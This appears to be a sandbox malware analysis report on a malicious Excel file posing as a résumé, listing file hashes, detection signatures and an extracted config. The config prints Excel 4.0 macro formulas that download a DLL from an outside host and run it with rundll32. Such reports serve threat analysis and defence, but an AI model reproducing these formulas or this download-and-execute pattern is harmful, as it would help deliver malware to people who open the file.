General
-
Target
William Smith Resume.xls
-
Size
163KB
-
Sample
200410-tmzpvazbjn
-
MD5
0a054818926d97f4100774255a908dba
-
SHA1
de572eddd30b34d1e328c8d5fb986cc1e04c82e8
-
SHA256
0fba1f02cd2872efc4cdc6806bc49d786005f590971ee31f97ce71c1ccf87fe2
-
SHA512
21659d1132eef51aaf43f7c3dffde06e7018e7d9847c7a7106eb9aee2747f9c6a967a80ab052db17903b0ac9cb63ee3c8371725f4206decff13dbbe996bcf3f1
Static task
static1
Behavioral task
behavioral1
Sample
William Smith Resume.xls
Resource
win7v200217
Behavioral task
behavioral2
Sample
William Smith Resume.xls
Resource
win10v200217
Malware Config
Extracted
http://march262020.com/files/april8.dll
-
formulas
=CALL("URLMON","URLDownloadToFileA","JJCCJJ",0,"http://march262020.com/files/april8.dll","C:\ProgramData\ieTneVi.dll",0,0) =CALL("Shell32","ShellExecuteA",AE1177,0,"Open","rundll32.exe","C:\ProgramData\ieTneVi.dll,DllRegisterServer",0,0) =HALT()
Targets
-
-
Target
William Smith Resume.xls
-
Size
163KB
-
MD5
0a054818926d97f4100774255a908dba
-
SHA1
de572eddd30b34d1e328c8d5fb986cc1e04c82e8
-
SHA256
0fba1f02cd2872efc4cdc6806bc49d786005f590971ee31f97ce71c1ccf87fe2
-
SHA512
21659d1132eef51aaf43f7c3dffde06e7018e7d9847c7a7106eb9aee2747f9c6a967a80ab052db17903b0ac9cb63ee3c8371725f4206decff13dbbe996bcf3f1
Score10/10-
Process spawned unexpected child process
This typically indicates the parent process was compromised via an exploit or macro.
-
Process spawned suspicious child process
This child process is typically not spawned unless (for example) the parent process crashes. This typically indicates the parent process was unsuccessfully compromised.
-